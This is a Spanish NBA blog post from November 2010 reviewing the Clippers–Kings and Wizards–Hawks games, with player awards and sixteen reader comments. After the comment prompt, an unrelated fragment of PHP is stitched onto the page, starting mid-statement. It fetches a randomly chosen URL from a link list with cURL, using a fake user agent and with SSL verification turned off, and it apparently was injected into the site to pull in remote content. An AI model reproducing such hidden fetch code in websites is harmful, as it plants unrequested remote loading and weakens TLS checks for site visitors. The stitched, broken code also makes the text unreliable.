La Crónica (25/11/2010)

26 de November de 2010 por txusma

Noche digestión baloncestística y dieta. No conviene empacharnos.

Es buen día para pararnos en aspectos sobre los que no podemos incidir habitualmente. Ayer, sin ir más lejos, los Clippers destrozaron sin piedad a los Sacramento Kings (82-100). No lo hemos comentado, pero el equipo de la capital de California es una de las pequeñas decepciones del campeonato. Tyreke y Casspi están pasando un difícil segundo año mientras que a Thompson le ha sentado terrible la llegada de Cousins y Dalembert. Por si fuera poco el rookie no está siendo la bestia parda que alguno prometía. El caso es que un equipo tan terrible y con tantos problemas como los Clippers ayer les pasó por encima y está próximo a hacerlo en la clasificación. Les bastó con Griffin y Gordon a lo suyo, que es mucho. Les falta todavía tener un banco en condiciones. Foye, Gomes, Butler y Cook están para echarlos a los leones.

A los Hawks les vino fenomenal la visita de los Wizards. Los de la capital no ganan fuera de su casa ni a tiros y más concretamente no ganan en Atlanta ni aunque su vida dependa de ello (96-116). Se juntan el hambre con las ganas de comer. Josh, Joe, Jamal y Al cuajaron un partido correcto… que no es poco con los tiempos que corren. Por los Wizards sólo estuvieron bien Arenas y Nick Young. Ni siquiera la perla Wall. No es su liga ahora mismo.

PREMIOS

MVP: Fenomenal partido de Josh Smith con 20 puntos, 14 rebotes, 5 asistencias, 2 robos y 2 tapones en apenas 29 minutos de juego. Hasta le sobró el último cuarto.

Rookie: No se enfrentaban directamente pero jugaban el mismo día en que sólo teníamos 2 partidos así que la comparación era inevitable. Blake Griffin, 25 puntos, 15 rebotes y 5 asistencias. John Wall, 10 puntos y 7 asistencias. Ganador claro.

Sorpresa: Luther Head se ha hecho con el puesto de base titular en los Kings y la verdad es que va respondiendo. Anoche repartió 7 asistencias y anotó 15 puntos

Decepción: Tyreke Evans no ha empezado la temporada con buen pie. Con el de ayer ya van 3 partidos en que no pasa de los 11 puntos con deplorables porcentajes de tiro. Concretamente anoche se quedó en 8 puntos, con 2 de 13 en tiros de campo.

Esfuerzo en vano: Arenas consiguió la mayoría de sus puntos con el partido decidido en el último cuarto así que preferimos destacar a Carl Landry, el jugador que sostuvo a los Kings durante el primer cuarto antes la “ausencia” de Tyreke. Finalmente, acabó el partido con 18 puntos, 6 rebotes y 3 asistencias.

Comenta

16 comentarios a esta entrada

  1. Rompe dice:
    #1

    Buen día para fijarse en los que normalmente no tienen demasiado protagonismo. Brutal actuación, de nuevo, de Blake. Para mi mejor que la de Josh Smith, o como mínimo un MVP compartido jeje.
    Wall y Arenas se van acoplando poco a poco. Si llegaran a funcionar serían temibles, pero de momento me da que no es el caso…

      Citar

  2. Busky23 dice:
    #2

    Nueva muestra de poderío de Griffin,para mi debería de ser el mvp de la jornada,25+15 con buenos porcentajes. Por muy bueno que sea John Wall dudo que pueda aspirar al ROY contra este crack. Por fin los Clippers tienen a un All-Star en condiciones y no ese tal Kaman.
    Poco que destacar d esta racana jornada (bueno si,el alley-hoop bestial de Josh Smith)
    Hoy en cambio,dos partidacos,duelo texano y duelo en Salt Lake city,llegan los Lakers!

      Citar

  3. Viva_Dirk dice:
    #3

    El tema del banco de los Clippers deberia arreglarse con Davis y Kaman a buen nivel, por mas vueltas que le doy no veo el motivo para que Davis-Gordon-Aminu-Griffin-Kaman, con Jordan, Bledsoe y el resto de suplentes no peleen los play-offs, desde luego yo buscaría un traspaso con Davis, si para endosar su contrato tiene que ir Kaman con el, que vaya, a poder ser por Billups o Andre Miller que harian funcionar a estos como un reloj.

      Citar

  4. toni dice:
    #4

    Coincido con que quizá una de las mayores decepciones de esta temporada esté siendo Tyreke, más le vale a los Kings que solo sea una mala racha porque de lo contrario estarían bastante perdidos.

    ¡Griffin es una bestia!

      Citar

  5. TheDeerHunter dice:
    #5

    Le llegamos a llamar como el “nuevo Wade”. Ya es curioso que su bajón coincida con el del original… Y bueno, los rookies del año pasado, tampoco sé lo que les está ocurriendo en general. Flojos, flojos.

      Citar

  6. Txusma dice:
    #6

    Dicen que el 2ª año de un jugador es aún más importante que el primero, por aquello de que lo difícil no es llegar sinó mantenerse.

      Citar

  7. toni dice:
    #7

    Si, una situación (salvando las distancias) similar a la de Rudy.
    Es cierto que cabía esperar una mayor progresion de algunos de los rookies que más destacaron durante el curso pasado como pueden ser Tyreke, Jennings o Collison.

    Buen partido hoy en abierto por cuatro: Utah-Lakers.

      Citar

  8. CAMPO2 dice:
    #8

    Ayer vi la primera parte del wizards – Hawks, Javale McGee es un paquete de cuidado, en cuanto toca atacar en estatico es penoso y en defensa un coladero, a Wall lo veo acelerado y hay momentos de partidos que se piensa que esta jugando contra universitarios porque se lanza contra la zona donde le esperan 2 o 3 jugadores con hacha en mano y no le dejan ni tirar para conseguir por lo menos tiros libres, me parece que su juego es un poco caotico

      Citar

  9. Cocinitas dice:
    #9

    A mi me parece que Stephen Curry si que esta haciendo un buen segundo año promedia 20-4-6 que no esta nada mal y además a mi me parece un jugón de los buenos.

      Citar

  10. Jona dice:
    #10

    y ademas curry a tenido lesion a principios de la temporada de un tobillo, y hay que recordar como empezo el año pasado y el ultimo tramo que se marco , para mi Curry ya demostró a final de temporada que era mucho mas completo que Evans

      Citar

  11. Denise dice:
    #11

    mcGee no es Shaq, ni siquiera Howard, pero tampoco es un paquete. A poco que progrese y empieze a dominar los movimeintos ofensivos más básicos, estaremos hablando de un 15-10-3 facilmente (puntos, rbtes, tap). tal y como está el Este de pésimo, si los Wizards consiguen involucrar a Arenas y que asiente la cabeza, se meten en Playoffs fijo.

      Citar

  12. Scriers dice:
    #12

    Es que vaya tendencia tenemos a… “el nuevo tal”, “el nuevo cual”… y eso no deja crecer a los jugadores que en nada tienen un ego enorme. Vamos a dejar tiempo y no evaluar prematuramente. Hay muchos jugadores que en dos actuaciones ya se ven en el top de la liga. Y tampoco es eso, que luego se la pegan.

      Citar

  13. CAMPO2 dice:
    #13

    No espero que sea shaq o howard, pero con esa envergadura da para algo mas o por lo menos que aprenda a colocarse mejor, también me imagino que si estuviese en un equipo ganador estaría mas arropado y se mostraría su mejor nivel, porque en los wizards son una banda y el este da pena verlo

      Citar

  14. Denise dice:
    #14

    Si McGee tiene la cabeza bien asentada, se entrena duro, y le ponen un buen entrenador personal, tipo Ewing con Howard.
    Los Centers con mayor progresión van a ser Love, Hibbert y Brooke Lopez, mientras que McGee estaría un peldaño por debajo de ellos pero haciendo una buena carrera en la NBA.
    Cierto es, que el nivel de los hombres altos con respecto al de la decada de los 90 es bastante inferior

      Citar

  15. kantonyo dice:
    #15

    Que injustos sois con DeMarcus Cousins. De verdad pensais que no lo está haciendo bien? Yo creo que 10.6 puntos, 6.9 rebotes en 24 minutos para un rookie que ha llegado como freshman de la universidad esta más que bien. Hace una media de 16 puntos y 10,3 rebotes en 36 minutos. Aunque si es verdad que debe mejorar su selección de tiro, yo creo que le cuesta todavía dominar bien la zona, ya que le veo demasiado lejos del aro y eso provoca su mal porcentaje de tiro.

    Sinceramente me están defraudando personalmente más Wes Johnson y Evan Turner, pero creo que hay jugadores que necesitan más confianza. A Turner especialmente le veo con demasiada vergüenza para tener responsabilidad de tiro y de dirección a pesar de haber sido un número 2 del draft.

      Citar

  16. CAMPO2 dice:
    #16

    En el tema de pivots dominantes en el futuro, estoy con que love, Lopez y hibbert serán los referentes en el futuro junto con Marc gasol o al horford aunque este sea mas un AP pero hay que decir que el autentico dominante será howard que para eso tiene 24 años y los que hemos nombrado solo un par(love y Lopez) le ganan en calidad el resto a sufrir y los rookies de este año están mas verdes que nunca

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>